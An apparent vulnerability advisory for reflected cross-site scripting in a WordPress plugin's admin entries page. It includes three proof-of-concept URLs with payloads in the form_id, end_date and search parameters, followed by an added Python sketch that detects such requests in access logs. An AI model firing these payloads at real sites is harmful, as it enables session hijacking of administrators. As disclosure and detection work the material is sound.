The plugin does not sanitise and escape various parameters, such as form_id, status, end_date, order, orderby and search, before outputting them back in the admin page.
https://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5e1kpc%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS%2F%29%2F%2F+ne97l&status&tab=entries&search&order=desc&orderby=fir+

https://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=&tab=entries&search=&order=asc&orderby=file-438&field=&time=&start_date=&end_date=onobw%22%3e%3cscript%3ealert(1)%3c%2fscript%3ez2u4g

https://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=&tab=entries&search=e67x3%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22oakfc&order=asc&orderby=file-438&field=&time=&start_date=&end_date=
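A detection sketch for web access logs, added here as an example and not part of the original advisory or the plugin's code: it flags requests to the vxcf_leads admin page in which one of the parameters named above carries quote or angle-bracket characters after decoding. The function names, the breakout character set and the sample request targets are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Parameters the advisory lists as echoed into the admin page without escaping.
REFLECTED_PARAMS = ("form_id", "status", "end_date", "order", "orderby", "search")
# Characters that end an HTML attribute value or open a tag once reflected.
BREAKOUT = re.compile(r"[\"'<>]")


def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %2522) so encoded quotes are not missed."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_request(target):
    """Return the advisory-listed parameters whose decoded value contains
    markup-breaking characters, for requests to the vxcf_leads admin page."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin.php"):
        return []
    query = parse_qs(parts.query, keep_blank_values=True)
    if "vxcf_leads" not in query.get("page", []):
        return []
    return [
        name
        for name in REFLECTED_PARAMS
        if any(BREAKOUT.search(fully_decode(v)) for v in query.get(name, []))
    ]


# Constructed request targets (not taken from real logs); values are inert markers.
SAMPLES = [
    "/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&tab=entries&order=asc&search=smith",
    "/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5%22+data-x%3D%22y&tab=entries",
    "/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&end_date=2021-11-01%2522%253Cb%253E",
    "/wp-admin/admin.php?page=other_plugin&search=%3Cb%3E",
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(flag_request(target) or "clean", target)
```

A legitimate search term containing an apostrophe will also be flagged, so treat hits as leads for review rather than confirmed exploitation attempts.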
Gaetano Perrone
Gaetano Perrone
Yes
2021-11-14 (about 1 year ago)
2021-12-24 (about 1 year ago)
2022-04-10 (about 1 year ago)